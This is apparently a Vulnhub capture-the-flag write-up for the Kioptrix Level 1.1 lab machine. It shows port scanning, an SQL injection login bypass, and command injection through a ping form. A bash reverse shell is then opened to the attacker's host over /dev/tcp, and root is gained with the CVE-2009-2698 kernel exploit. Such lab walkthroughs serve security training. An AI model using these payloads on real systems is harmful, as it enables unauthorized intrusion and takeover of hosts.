Nmap
Port 80
Exploitation
Post exploitation
Privilege escalation: apache to root
Enumeration
Linux Exploit Suggester 2
Exploitation
CVE-2009-2698
Welcome to the Kioptrix-2 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Kioptrix-2
tags: Vulnhub
Easy
Linux
OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux
Link: Click here
Kioptrix: Level 1.1 (#2)
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:35 CEST
Nmap scan report for 172.20.10.7
Host is up (0.0016s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
792/tcp open unknown
3306/tcp open mysql
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80,111,443,631,792,3306 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:38 CEST
Nmap scan report for 172.20.10.7
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 789/udp status
|_ 100024 1 792/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-06-30T16:28:42+00:00; -3h09m41s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
792/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -3h09m41s
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 172.20.10.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds
Port 80
Within the website of port 80 we find an authentication form.
Knowing that MySQL is installed on the server as we have seen in the Nmap analysis, we are going to try the typical injection 'OR' 1 '=' 1
.
And we are in!
Now, we find a form that allows us to ping an IP address
Exploitation
To test if we can inject commands, we are going to execute the request by launching the local IP with the concatenated id command 127.0.0.1;id
.
127.0.0.1;id
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.010 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.043 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.010/0.022/0.043/0.015 ms, pipe 2
uid=48(apache) gid=48(apache) groups=48(apache)
Yeah, we have RCE, let's go for a shell!
We put a terminal to listen and execute the form with our shell as payload
127.0.0.1;bash -i >& /dev/tcp/172.20.10.4/8787 0>&1
We wait a few seconds...
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.7] 32769
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
And we have a shell as apache
!
Post exploitation
Privilege escalation: apache to root
Enumeration
Linux Exploit Suggester 2
bash-3.00$ perl linux-exploit-suggester-2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.9
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] exp.sh
[3] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[4] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[5] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[6] krad
[7] krad3
Source: http://exploit-db.com/exploits/1397
[8] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[9] py2
[10] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[11] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[12] udp_sendmsg_32bit
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[13] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
Knowing that the machine has the sendmessage service running, we are going to use the CVE-2009-2698
.
Exploitation
CVE-2009-2698
The link that the script offers us does not work at the moment but, we can easily find it online by looking for the name or the CVE. For example in this link
bash-3.00$ gcc udp_sendmsg_32bit.c -o 0x82-CVE-2009-2698 && ./0x82-CVE-2009-2698
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
And that's all folks!